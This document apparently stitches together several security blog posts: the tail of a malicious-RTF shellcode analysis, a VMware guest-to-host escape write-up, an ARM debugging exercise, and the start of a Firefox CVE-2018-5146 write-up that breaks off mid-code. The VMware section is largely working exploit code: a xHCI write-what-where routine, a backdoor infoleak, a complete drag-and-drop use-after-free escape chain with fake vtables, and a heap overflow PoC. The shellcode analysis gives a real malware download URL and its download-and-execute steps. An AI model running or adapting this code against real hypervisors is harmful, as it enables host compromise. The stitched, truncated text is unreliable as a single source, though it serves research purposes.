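    each key is XORed little-endian over the next 4 bytes, and a trailing
    partial dword uses only the matching low bytes of the key.
    """
    out = bytearray(data)
    key = 0
    for pos in range(0, len(out), 4):
        key = (key * KEY_MUL + KEY_ADD) & 0xFFFFFFFF
        key_bytes = struct.pack("<I", key)
        for i in range(min(4, len(out) - pos)):
            out[pos + i] ^= key_bytes[i]
    return bytes(out)
```

For instance, suppose shellcode holds the raw bytes that IDA loads at 0x401000. Then xor_decrypt(shellcode[0x3FE:0x3FE + 0x389]) should expose the same URL. Since XOR is its own inverse, applying the function twice returns the original data.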

Figure: bytes before and after the decryption

In the decryption loop, there is a call to sub_40147e, which was meaningless before the decryption because the jmp destination was out of range.

Figure: before the decryption

After the decryption, however, the same function is totally different. You can observe many dynamic (indirect) call instructions, which most likely go through function pointers resolved via GetProcAddress.

Figure: after the decryption

To keep the post short (and being too lazy to continue with static analysis), I turned to Windbg. The shellcode’s behavior can be summarized in the following steps:

  • ExpandEnvironmentStringsW(“%APPDATA%\wwindowss.exe”,dst_path)
  • URLDownloadToFileW(“ http://reggiewaller.com/404/ac/ppre.exe”,dst_path)
  • CreateProcessW(“C:\Users\vmuser\AppData\Roaming\wwindowss.exe”)
  • ExitProcess
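Every API in the list is a wide-character (W) function, so the path and URL arguments are presumably UTF-16LE strings in the decrypted shellcode. A small Python sketch that pulls out printable ASCII and UTF-16LE strings can speed up this kind of triage. extract_strings is a hypothetical helper, and the 6-character minimum is arbitrary. The sketch will miss strings that the shellcode assembles at run time.

```python
import re

UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")  # printable ASCII as UTF-16LE
ASCII_RE = re.compile(rb"[\x20-\x7e]{6,}")


def extract_strings(buf):
    """Return (ascii_strings, wide_strings) of at least 6 printable chars."""
    ascii_strings = [m.group().decode("ascii") for m in ASCII_RE.finditer(buf)]
    wide_strings = [m.group().decode("utf-16-le") for m in UTF16_RE.finditer(buf)]
    return ascii_strings, wide_strings
```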

That’s all folks! This post and any following ones are simply a notepad documenting some basic analysis steps. Any comments or corrections are more than welcome.

Above, we presented an analysis of a malicious RTF detected by a sandbox. The RTF exploits CVE-2017-11882. We analyzed the RTF, extracted the shellcode and analyzed it. The shellcode is a plain download-and-execute shellcode.

A bunch of Red Pills: VMware Escapes

Background

VMware is one of the leaders in virtualization nowadays. They offer VMware ESXi for the cloud, and VMware Workstation and Fusion for desktops (Windows, Linux, macOS).
The technology is very well known to the public: it allows users to run unmodified guest “virtual machines”.
Often those virtual machines are not trusted, and they must be isolated.
VMware goes to great lengths to offer this isolation, especially in the ESXi product, where virtual machines of different actors can potentially run on the same hardware. So strong isolation is of paramount importance.

Pwn2Own recently introduced a “Virtualization” category, and VMware has been among the targets since Pwn2Own 2016.

In 2017 we successfully demonstrated a VMware escape from the guest to the host from an unprivileged account, resulting in code execution on the host and breaking out of the virtual machine.

If you escape your virtual machine environment then all isolation assurances are lost, since you are running code on the host, which controls the guests.

But how does VMware work?

In a nutshell, it often uses CPU and memory hardware virtualization technologies (although they are not strictly required), so that a guest virtual machine can run code at native speed most of the time.

But a modern system is not just a CPU and memory; it also requires a lot of other hardware to work properly and be useful.

This point is very important because it constitutes one of the biggest attack surfaces of VMware: the virtualized hardware.

Virtualizing a hardware device is not a trivial task. This becomes clear from reading any datasheet that describes the hardware/software interface of a PC hardware device.

VMware traps I/O accesses to such a virtual device and must emulate all those low-level operations correctly: since it aims to run unmodified kernels, its emulated devices must behave as closely as possible to their real counterparts.

Furthermore, if you have ever used VMware, you might have noticed its copy-and-paste capabilities and shared folders. How are those implemented?

In this blog post, we will cover quite a few bugs: several in the “backdoor” functionality that supports those “extra” services such as copy and paste (C&P), and one in a virtualized device.

Although many VMware blog posts and presentations have been released recently, we felt the need to write our own for the following reasons:

  • First, no one has ever described our Pwn2Own bugs correctly, so we want to shed light on them.
  • Second, some of the published resources lack either details or code.

So we hope you will enjoy our blog post!

We will begin with some background information to get you up to speed.

Let’s get started!

Overall architecture

A complex product like VMware consists of several components; we will highlight only the most important ones, since the VMware architecture has already been discussed extensively elsewhere.

  • VMM: this piece of software runs at the highest possible privilege level on the physical machine. It makes the VMs tick and run, and also handles all the tasks that are impossible to perform from ring 3 on the host, for example.
  • vmnat: vmnat is responsible for network packet handling, since VMware offers advanced features such as NAT and virtual networks.
  • vmware-vmx: every virtual machine started on the system has its own vmware-vmx process running on the host. This process handles a lot of tasks relevant to this blog post, including much of the device emulation and the handling of backdoor requests. Exploiting the chains we present results in code execution on the host in the context of vmware-vmx.

Backdoor

The so-called backdoor is not actually a “backdoor”; it is simply a mechanism implemented in VMware for guest-host and host-guest communication.

A useful resource for understanding this interface is the open-vm-tools repository by VMware itself.

At the lowest level, the backdoor consists of two I/O ports, 0x5658 and 0x5659: the first for “traditional” communication, the second for “high-bandwidth” communication.

The guest issues in/out instructions on those ports, following a register convention, and is thereby able to communicate with VMware running on the host.

The hypervisor will trap and service the request.
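The register convention can be summarized in a short Python sketch. Python cannot execute port I/O, so backdoor_request (a hypothetical helper) only builds the register values a guest would load before executing in eax, dx. The constants are the ones I recall from open-vm-tools' backdoor definitions (magic 0x564D5868, ports 0x5658/0x5659, GETVERSION command 10), and they are worth double-checking against the repository.

```python
BDOOR_MAGIC = 0x564D5868      # reads as "VMXh" in big-endian byte order
BDOOR_PORT = 0x5658           # low-bandwidth ("traditional") port
BDOOR_HB_PORT = 0x5659        # high-bandwidth port
BDOOR_CMD_GETVERSION = 10


def backdoor_request(command, argument=0):
    """Register values for a low-bandwidth backdoor call (description only)."""
    return {
        "eax": BDOOR_MAGIC,   # magic value identifying a backdoor request
        "ebx": argument,      # command-specific parameter
        "ecx": command,       # backdoor command number
        "edx": BDOOR_PORT,    # I/O port used by the in instruction
    }


regs = backdoor_request(BDOOR_CMD_GETVERSION)
print({name: hex(value) for name, value in regs.items()})
print(BDOOR_MAGIC.to_bytes(4, "big"))  # b'VMXh'
```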

On top of this low-level mechanism, VMware implemented some more convenient high-level protocols. Since they have been covered extensively elsewhere, we will not spend much time on the details; we encourage you to check the open-vm-tools repository to discover them.
Just to mention a few of those higher level protocols: drag and drop, copy and paste, guestrpc.

The fundamental points to remember are:

  • It is a guest-host interface that we can use.
  • It exposes complex services and functionalities.
  • Many of these functionalities can be used from ring 3 in the guest VM.

xHCI

xHCI (eXtensible Host Controller Interface) is Intel's specification of a USB host controller (normally implemented in hardware on a regular PC) that supports USB 1.x, 2.0 and 3.x.

You can find the relevant specification here.

On a physical machine it is often present, for example:

00:14.0 USB controller: Intel Corporation C610/X99 series chipset USB xHCI Host Controller (rev 05)

In VMware this hardware device is emulated, and if you create a Windows 10 virtual machine, this emulated controller is enabled by default, so a guest virtual machine can interact with this particular emulated device.

The interaction, like with a lot of hardware devices, will take place in the PCI memory space and in the IO memory mapped space.

This very low level interface is the one used by the OS kernel driver in order to schedule usb work, and receive data and all the tasks related to USB.

Just by looking at the specifications alone, which are more than 600 pages, it’s no surprise that this piece of hardware and its interface are very complex, and the specifications just covers the interface and the behavior, not the actual implementation.

Now imagine actually emulating this complex hardware. You can imagine it’s a very complex and error prone task, as we will see soon.

To talk directly to hardware (and therefore also to virtualized hardware), you usually need to run in ring 0 in the guest. That’s why, as you will see in the next paragraphs, we used a Windows kernel LPE inside the VM.

Mitigations

VMware ships with “baseline” mitigations which are expected in modern software, such as ASLR, stack cookies etc.

More advanced Windows mitigations, such as CFG (Microsoft's implementation of Control Flow Integrity), are not deployed at the time of writing.

Pwn2Own 2017: VMware Escape by two bugs in 1 second

Team Sniper (Keen Lab and PC Mgr) targeted VMware Workstation (Guest-to-Host), and the event certainly did not end with a whimper. They used a three-bug chain to win the Virtual Machine Escapes (Guest-to-Host) category with a VMware Workstation exploit: a Windows kernel UAF, a Workstation infoleak, and an uninitialized buffer in Workstation to go guest-to-host. This category ratcheted up the difficulty even further because VMware Tools were not installed in the guest.

The following vulnerabilities were identified and analyzed:

  • CVE-2017-4904 (critical): xHCI uninitialized stack value leading to arbitrary code execution
  • CVE-2017-4905 (moderate): Backdoor uninitialized memory read leading to information disclosure

CVE-2017-4904 xHCI uninitialized stack variable

This is an uninitialized variable vulnerability in the emulated xHCI device, triggered when changes to a Device Context are written back to guest physical memory.

The xHCI reports some status information to system software through the “Device Context” structure. The address of a Device Context is stored in the DCBAA (Device Context Base Address Array), whose address is in turn held in the DCBAAP (Device Context Base Address Array Pointer) register. Both the Device Context and the DCBAA reside in physical RAM. The xHCI device keeps an internal cache of the Device Context and only updates the copy in physical memory when something changes. To update the Device Context, the virtual machine monitor maps the guest physical memory containing it into the memory space of the monitor process and then performs the update. However, the mapping can fail and leave the result variable untouched. The code takes no precaution against this and directly uses the result as the destination address of a memory write, resulting in an uninitialized variable vulnerability.
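The pattern behind CVE-2017-4904 can be illustrated with a small, self-contained C sketch. The names map_guest_phys() and write_back_device_context() are hypothetical stand-ins, not VMware's functions, and guest RAM is modeled as a plain byte array; the point is that the destination pointer is initialized and the mapping result is checked before the write.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for the monitor's mapping helper: on failure it
   returns false and leaves *out untouched, like the function described above. */
static bool map_guest_phys(uint8_t *guest_ram, size_t ram_size,
                           uint64_t gpa, size_t len, uint8_t **out) {
    if (gpa >= ram_size || len > ram_size - (size_t)gpa)
        return false;                 /* e.g. 0xffffffffffffffff is not backed by RAM */
    *out = guest_ram + gpa;
    return true;
}

/* Write-back of a cached Device Context. The vulnerable code skipped the
   failure check and wrote through whatever value the uninitialized pointer
   held; here the pointer starts as NULL and the result is checked. */
static bool write_back_device_context(uint8_t *guest_ram, size_t ram_size,
                                      uint64_t dc_gpa,
                                      const uint8_t *ctx, size_t ctx_len) {
    uint8_t *dst = NULL;
    if (!map_guest_phys(guest_ram, ram_size, dc_gpa, ctx_len, &dst))
        return false;                 /* refuse the write instead of using a stale pointer */
    memcpy(dst, ctx, ctx_len);
    return true;
}
```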

To trigger this bug, the following steps should be taken:

  1. Issue an “Enable Slot” command to the xHCI, and get the resulting slot number from the Event TRB.
  2. Set the DCBAAP to point to a controlled buffer.
  3. Put an invalid physical address, e.g. 0xffffffffffffffff, into the corresponding slot of the DCBAA buffer.
  4. Issue an “Address Device” command. The xHCI reads the base address of the Device Context from the DCBAA into its internal cache; this value is the controlled invalid address.
  5. Issue a “Configure Endpoint” command. The bug triggers when the xHCI updates the corresponding Device Context.
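The commands in steps 1, 4 and 5 are submitted as Transfer Request Blocks (TRBs) on the command ring. Below is a sketch of how such a command TRB can be encoded, following the field positions in the xHCI specification (cycle bit in bit 0, TRB type in bits 15:10, slot ID in bits 31:24). The exploit's own TRB_SET macro is not shown in the source, so make_cmd_trb() is a hypothetical stand-in.

```c
#include <stdint.h>
#include <string.h>

/* A 16-byte Transfer Request Block as laid out in the xHCI spec. */
typedef struct {
    uint64_t parameter;   /* e.g. Input Context pointer for Address Device / Configure Endpoint */
    uint32_t status;
    uint32_t control;     /* bit 0: cycle, bits 15:10: TRB type, bits 31:24: slot ID */
} trb_sketch;

/* Command TRB type codes from the xHCI spec. */
enum { TRB_ENABLE_SLOT = 9, TRB_ADDRESS_DEVICE = 11, TRB_CONFIGURE_ENDPOINT = 12 };

static trb_sketch make_cmd_trb(unsigned type, unsigned slot_id,
                               uint64_t input_ctx, unsigned cycle) {
    trb_sketch t;
    memset(&t, 0, sizeof t);
    t.parameter = input_ctx;
    t.control = (cycle & 1u) | ((type & 0x3Fu) << 10) | ((slot_id & 0xFFu) << 24);
    return t;
}
```

For example, an Enable Slot command with the cycle bit set encodes its control dword as 0x2401.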

The uninitialized variable resides on the stack. Its value can be controlled through one of the Endpoint Contexts of the Input Context supplied with the “Configure Endpoint” command, since the Input Context also resides on the stack. Therefore we control the destination address of the write. The contents to be written come from the Endpoint Context of the Device Context, which is copied from the corresponding controllable Endpoint Context of the Input Context, resulting in a write-what-where primitive. Combined with the info leak vulnerability, this lets us overwrite some function pointers and finally ROP to arbitrary code execution.

Exploit code

void write_what_where(uint64 xhci_base, uint64 where, uint64 what)
{
    xhci_cap_regs *cap_regs = (xhci_cap_regs*)xhci_base;
    xhci_op_regs *op_regs = (xhci_op_regs*)(xhci_base + (cap_regs->hc_capbase & 0xff));
    xhci_doorbell_array *db = (xhci_doorbell_array*)(xhci_base + cap_regs->db_off);
    int max_slots = cap_regs->hcs_params1 & 0xf;
    uint8 *playground = (uint8 *)ExAllocatePoolWithTag(NonPagedPool, 0x1000, 'NEEK');
    if (!playground) return;
    playground[0] = 0;
    uint64 *dcbaa = (uint64*)playground;
    playground += sizeof(uint64) * max_slots;
    for (int i = 0; i < max_slots; ++i)
    {
        dcbaa[i] = 0xffffffffffffffc0;
    }
    op_regs->dcbaa_ptr = MmGetPhysicalAddress(dcbaa).QuadPart;
    
    playground = (uint8*)(((uint64)playground + 0x10) & (~0xf));
    input_context *input_ctx = (input_context*)playground;
    
    playground += sizeof(input_context);
    playground = (uint8*)(((uint64)playground + 0x40) & (~0x3f));
    uint8 *cring = playground;
    uint64 cmd_ring = MmGetPhysicalAddress(cring).QuadPart | 1;
    
    trb_t *cmd = (trb_t*)cring;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ENABLE_SLOT);
    TRB_SET(C, cmd, 1);
    cmd++;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = 3;
    input_ctx->slot_ctx.context_entries = 1;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ADDRESS_DEV);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 1);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db->doorbell[0] = 0; // db is a pointer; ring doorbell 0 (host controller command doorbell)
    
    cmd = (trb_t*)cring;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = (1u<<31)|(1u<<30);
    input_ctx->slot_ctx.context_entries = 31;
    uint64 *value = (uint64*)(&input_ctx->ep_ctx[30]);
    uint64 *addr = ((uint64*)(&input_ctx->ep_ctx[31])) + 1;
    value[0] = 0;
    value[1] = what;
    value[2] = 0;
    addr[0] = where - 0x3b8;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_CONFIGURE_EP);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 0);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db->doorbell[0] = 0; // db is a pointer; ring doorbell 0 again to run Configure Endpoint
}

CVE-2017-4905 Backdoor uninitialized memory read

This is an uninitialized memory vulnerability in the Backdoor callback handler. A buffer is allocated on the stack when processing backdoor requests, and it should be initialized in the BDOORHB callback. However, when invalid commands are requested, the callback fails to clear the buffer properly, so the uninitialized contents of the stack buffer are leaked to the guest. With this bug we can effectively defeat the ASLR of vmware-vmx running on the host; the success rate of exploiting it is 100%.

Credits to JunMao of Tencent PCManager.
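Why does a missing clear leak host data? The following C sketch models the stack frame as a buffer that is reused across calls, so whatever earlier host code left there is still present when the handler runs. Everything here (the buffer size, handle_request(), the command values) is hypothetical; the fix is simply to clear the buffer before filling it.

```c
#include <string.h>

#define SCRATCH_SIZE 64

/* Models a stack frame reused across calls: earlier contents survive. */
static unsigned char reused_frame[SCRATCH_SIZE];

/* Unrelated host work that leaves sensitive bytes (e.g. pointers) behind. */
static void earlier_host_work(void) {
    memset(reused_frame, 0x7F, SCRATCH_SIZE);
}

/* Hypothetical handler: fills the buffer only for a valid command (1), but
   always copies the whole buffer back to the guest. */
static void handle_request(int cmd, int clear_first, unsigned char *to_guest) {
    if (clear_first)
        memset(reused_frame, 0, SCRATCH_SIZE);   /* the fix */
    if (cmd == 1)
        memcpy(reused_frame, "OK", 3);
    memcpy(to_guest, reused_frame, SCRATCH_SIZE);
}
```

With clear_first set to 0, an invalid command returns the 0x7F bytes left by earlier_host_work(); with it set to 1, the guest only sees zeros.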

PoC

void infoleak()
{
    char *buf = (char *)VirtualAlloc(0, 0x8000, MEM_COMMIT, PAGE_READWRITE);
    memset(buf, 0, 0x8000);
    Backdoor_proto_hb hb;
    memset(&hb, 0, sizeof(Backdoor_proto_hb));
    hb.in.size = 0x8000;
    hb.in.dstAddr = (uintptr_t)buf;
    hb.in.bx.halfs.low = 2;
    Backdoor_HbIn(&hb);
    // buf will be filled with contents leaked from the vmware-vmx stack
    ...
    VirtualFree((void *)buf, 0x8000, MEM_DECOMMIT);
    return;
}

Behind the scenes of Pwn2Own 2017

Exploit the UAF bug in VMware Workstation Drag n Drop with single bug

By fuzzing VMware Workstation, we found this bug and completed a stable exploit chain using only this single bug in the last few days of February 2017. Unfortunately, the bug was patched in VMware Workstation 12.5.3, released on 9 March 2017. Since then we have noticed that few papers discuss this bug, and VMware has not even assigned it a CVE ID. That is a pity, because it is the best bug we have ever seen in VMware Workstation, and VMware just patched it quietly. Now we are going to show how to exploit VMware Workstation with this single bug.

Exploit Code

The success rate of this exploit is approximately 100%.

char *initial_dnd = "tools.capability.dnd_version 4";
static const int cbObj = 0x100;
char *second_dnd = "tools.capability.dnd_version 2";
char *chgver = "vmx.capability.dnd_version";
char *call_transport = "dnd.transport ";
char *readstring = "ToolsAutoInstallGetParams";
typedef struct _DnDCPMsgHdrV4
{
    char magic[14];
    char dummy[2];
    size_t ropper[13];
    char shellcode[175];
    char padding[0x80];
} DnDCPMsgHdrV4;


void PrepareLFH()
{
    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    for (int idx = 0; idx < 1; ++idx) // just occupy 1
    {
        char *spary = stringf("info-set guestinfo.k%d %s", idx, pObj);
        RpcOut_SendOneRaw(spary, strlen(spary), &result, NULL); //alloc one to occupy 4
    }
    free(pObj);
}

size_t infoleak()
{
#define MAX_LFH_BLOCK 512
    Message_Channel *chans[5] = {0};
    for (int i = 0; i < 5; ++i)
    {
        chans[i] = Message_Open(0x49435052);
        if (chans[i])
        {
            Message_SendSize(chans[i], cbObj - 1); //just alloc
        }
        else
        {
            Message_Close(chans[i - 1]); //keep 1 channel valid
            chans[i - 1] = 0;
            break;
        }
    }
    PrepareLFH(); //make sure we have at least 7 hole or open and occupy next LFH block
    for (int i = 0; i < 5; ++i)
    {
        if (chans[i])
        {
            Message_Close(chans[i]);
        }
    }

    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    char *spary2 = stringf("guest.upgrader_send_cmd_line_args %s", pObj);
    while (1)
    {
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        }

        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            if (chan == NULL)
            {
                puts("Message send error!");
                Sleep(100);
            }
            else
            {
                Message_SendSize(chan, cbObj - 1);
                Message_RawSend(chan, "\xA0\x75", 2); //just ret
                Message_Close(chan);
            }
        }
        Message_Channel *chan = Message_Open(0x49435052);
        Message_SendSize(chan, cbObj - 1);
        Message_RawSend(chan, "\xA0\x74", 2);                                 //free
        RpcOut_SendOneRaw(dndtransport, strlen(dndtransport), &result, NULL); //trigger double free
        for (int i = 0; i < min(cbObj-3,MAX_LFH_BLOCK); ++i)
        {
            RpcOut_SendOneRaw(spary2, strlen(spary2), &result, NULL);
            Message_RawSend(chan, "B", 1);
            RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
            if (result[0] == 'A' && result[1] == 'A' && strcmp(result, pObj))
            {
                Message_Close(chan); //free the string
                for (int i = 0; i < MAX_LFH_BLOCK; ++i)
                {
                    puts("Trying to leak vtable");
                    RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                    RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
                    size_t p = 0;
                    if (result)
                    {
                        memcpy(&p, result, min(strlen(result), 8));
                        printf("Leak content: %p\n", p);
                    }
                    size_t low = p & 0xFFFF;
                    if (low == 0x74A8 || //RpcBase
                        low == 0x74d0 || //CpV4
                        low == 0x7630)   //DnDV4
                    {
                        printf("vmware-vmx base: %p\n", (p & (~0xFFFF)) - 0x7a0000);
                        return (p & (~0xFFFF)) - 0x7a0000;
                    }
                    RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                }
            }
        }
        Message_Close(chan);
    }
    return 0;
}

void exploit(size_t base)
{
    char *result = NULL;
    char *uptime_info = stringf("SetGuestInfo -7-%I64u", 0x41414141);
    char *pObj = malloc(cbObj);
    memset(pObj, 0, cbObj);

    DnDCPMsgHdrV4 *hdr = malloc(sizeof(DnDCPMsgHdrV4));
    memset(hdr, 0, sizeof(DnDCPMsgHdrV4));
    memcpy(hdr->magic, call_transport, strlen(call_transport));
    while (1)
    {
        RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            Message_SendSize(chan, cbObj - 1);
            size_t fake_vtable[] = {
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340};

            memcpy(pObj, &fake_vtable, sizeof(size_t) * 4);

            Message_RawSend(chan, pObj, sizeof(size_t) * 4);
            Message_Close(chan);
        }
        RpcOut_SendOneRaw(uptime_info, strlen(uptime_info), &result, NULL);
        RpcOut_SendOneRaw(hdr, sizeof(DnDCPMsgHdrV4), &result, NULL);
        //check pwn success?
        RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
        if (*(size_t *)result == 0xdeadbeefc0debabe)
        {
            puts("VMware escape success! \nPwned by KeenLab, Tencent");
            RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);//fix dnd to callable prevent vmtoolsd problem
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            return;
        }
        //host dndv4 fill in, try to clean up and free again
        Sleep(100);
        puts("Object wrong! Retry...");
        RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
    }
}

int main(int argc, char *argv[])
{
    int ret = 1;
    __try
    {
        while (1)
        {
            size_t base = 0;
            do
            {
                puts("Leaking...");
                base = infoleak();
            } while (!base);
            puts("Pwning...");
            exploit(base);
            break;
        }
    }
    __except (ExceptionIsBackdoor(GetExceptionInformation()) ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
    {
        fprintf(stderr, NOT_VMWARE_ERROR);
        return 1;
    }
    return ret;
}
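The base-address computation at the end of infoleak() can be isolated into a small function. The three accepted low 16-bit values and the 0x7a0000 offset are taken directly from the exploit above and are specific to the vmware-vmx build that was targeted; the function name is hypothetical.

```c
#include <stdint.h>

/* Returns the vmware-vmx image base for a leaked vtable pointer, or 0 if the
   pointer is not one of the vtables the exploit recognizes. */
static uint64_t vmx_base_from_vtable(uint64_t leaked) {
    uint16_t low = (uint16_t)(leaked & 0xFFFF);
    if (low != 0x74A8 &&   /* RpcBase */
        low != 0x74D0 &&   /* CpV4 */
        low != 0x7630)     /* DnDV4 */
        return 0;
    return (leaked & ~(uint64_t)0xFFFF) - 0x7A0000;
}
```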

CVE-2017-4901 DnDv3 HeapOverflow

The drag-and-drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a guest to execute code on the operating system that runs Workstation or Fusion.

After VMware released 12.5.3, we continued auditing the DnD code and eventually found another heap overflow bug, similar to CVE-2016-7461. This bug was known to almost every participant in the VMware category at Pwn2Own 2017. Here we present the PoC for this bug.

void poc()
{
    int n;
    char *req1 = "tools.capability.dnd_version 3";
    char *req2 = "vmx.capability.dnd_version";
    RpcOut_SendOneRaw(req1, strlen(req1), NULL, NULL);
    RpcOut_SendOneRaw(req2, strlen(req2), NULL, NULL);

    char req3[0x80] = "dnd.transport ";
    n = strlen(req3);
    *(int*)(req3+n) = 3;
    *(int*)(req3+n+4) = 0;
    *(int*)(req3+n+8) = 0x100;
    *(int*)(req3+n+0xc) = 0;
    *(int*)(req3+n+0x10) = 0;
    // allocate buffer of 0x100 bytes
    RpcOut_SendOneRaw(req3, n+0x14, NULL, NULL);

    char req4[0x1000] = "dnd.transport ";
    n = strlen(req4);
    *(int*)(req4+n) = 3;
    *(int*)(req4+n+4) = 0;
    *(int*)(req4+n+8) = 0x1000;
    *(int*)(req4+n+0xc) = 0x800;
    *(int*)(req4+n+0x10) = 0;
    for (int i = 0; i < 0x800; ++i)
        req4[n+0x14+i] = 'A';
    // overflow with 0x800 bytes of 'A'
    RpcOut_SendOneRaw(req4, n+0x14+0x800, NULL, NULL);
}
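Judging from the PoC, the first dnd.transport packet makes the host allocate a 0x100-byte buffer, and the second packet, which claims a larger total size, delivers 0x800 bytes into it. The sketch below assumes the fields at +8, +0xc and +0x10 are the total size, the payload length and the offset, which is an interpretation of the PoC rather than something the source states. It shows the missing check in a hypothetical reassembly routine: each write is validated against the size that was actually allocated, not the size claimed by the current packet.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical reassembly buffer for a multi-packet message. */
typedef struct {
    uint8_t *buf;
    uint32_t alloc_size;   /* size chosen by the first packet */
} reassembly;

static int reassembly_put(reassembly *r, uint32_t total, uint32_t offset,
                          const uint8_t *data, uint32_t len) {
    if (r->buf == NULL) {              /* first packet decides the allocation */
        r->buf = malloc(total);
        if (r->buf == NULL)
            return -1;
        r->alloc_size = total;
    }
    /* Validate against alloc_size; trusting `total` here would let a later
       packet with a bigger claimed size overflow the buffer. */
    if (offset > r->alloc_size || len > r->alloc_size - offset)
        return -1;
    memcpy(r->buf + offset, data, len);
    return 0;
}
```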

Conclusions

In this article we presented several VMware bugs leading to guest-to-host virtual machine escape.
We hope to have demonstrated not only that VM breakouts are possible and real, but also that a determined attacker can achieve several of them, with good reliability.
We feel that our industry holds the misconception that running untrusted software inside a VM keeps us safe.
Think about the malware industry, which heavily relies on VMs for analysis, or the entire cloud, which basically runs on hypervisors.
Virtualization is certainly an additional protection layer that raises the bar for an attacker to achieve full compromise, so adopting it is very good practice.
But we must not forget that it is essentially just another “layer of sandboxing”, which can be bypassed or escaped.
So great care must also be taken to secure this layer.

ARM Reverse Engineering – Hacking Double Variables

Let’s review our code.

#include <iostream>

int main(void) {
    double myNumber = 1337.77;

    std::cout << myNumber << std::endl;

    return 0;
}

Let’s debug!

Let’s set a breakpoint at main+24 and continue.

We see strd r2, [r11, #-12]. It is important to understand exactly what this does: it stores the 64-bit doubleword held in the register pair r2/r3 into memory at offset -12 from r11. Let’s now examine what exactly resides there.

Voila! We see 1337.77 at that offset, stored specifically at address 0x7efff230 in memory.
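Why strd and a register pair? A double is 64 bits wide, so before the store its bits live in two 32-bit core registers. The C sketch below splits 1337.77 into its two IEEE-754 halves. Assuming a little-endian target (the usual configuration for ARM Linux), r2 holds the low word, stored at r11-12, and r3 holds the high word, stored at r11-8. The type and function names are illustrative.

```c
#include <stdint.h>
#include <string.h>

typedef struct { uint32_t lo, hi; } word_pair;

/* Split a double into the two 32-bit words a register pair would hold. */
static word_pair split_double(double d) {
    uint64_t bits;
    memcpy(&bits, &d, sizeof bits);      /* well-defined type pun */
    word_pair w = { (uint32_t)bits, (uint32_t)(bits >> 32) };
    return w;
}
```

For 1337.77 this yields 0x4094E714 for the high word and 0x7AE147AE for the low word.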

Let’s step twice, which executes vldr d0, [r11, #-12]: the 1337.77 stored at that location is now loaded into d0, a double-precision register of the floating-point (VFP) coprocessor. Let’s now print the value at that location.

Let’s hack the d0 register!

Now let’s reexamine the value inside d0.

Let’s continue.

Successfully hacked!

Writeup for CVE-2018-5146 or How to kill a (Fire)fox

1. Debug Environment

  • OS
    • Windows 10
  • Firefox_Setup_59.0.exe
    • SHA1: 294460F0287BCF5601193DCA0A90DB8FE740487C
  • Xul.dll
    • SHA1: E93D1E5AF21EB90DC8804F0503483F39D5B184A9

2. Patch Information

The issue in Mozilla’s Bugzilla is Bug 1446062.
The vulnerability used at Pwn2Own 2018 was assigned CVE-2018-5146.
The Mozilla security advisory shows that this vulnerability comes from libvorbis, a third-party media library. In the next section, I will introduce some background on this library.

3. Ogg and Vorbis

3.1. Ogg

Ogg is a free, open container format maintained by the Xiph.Org Foundation.
An Ogg file consists of a sequence of Ogg pages, and each Ogg page contains an Ogg header and a segment table.
The structure of an Ogg page is illustrated in the following picture.

Pic.1 Ogg Page Structure
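Since the picture is not reproduced here, the following C sketch parses the fixed 27-byte Ogg page header as defined in RFC 3533, followed by the segment table. The struct and function names are hypothetical; only the field layout comes from the format.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef struct {
    uint8_t  version;
    uint8_t  header_type;
    uint64_t granule_position;
    uint32_t serial;
    uint32_t sequence;
    uint32_t crc;
    uint8_t  page_segments;
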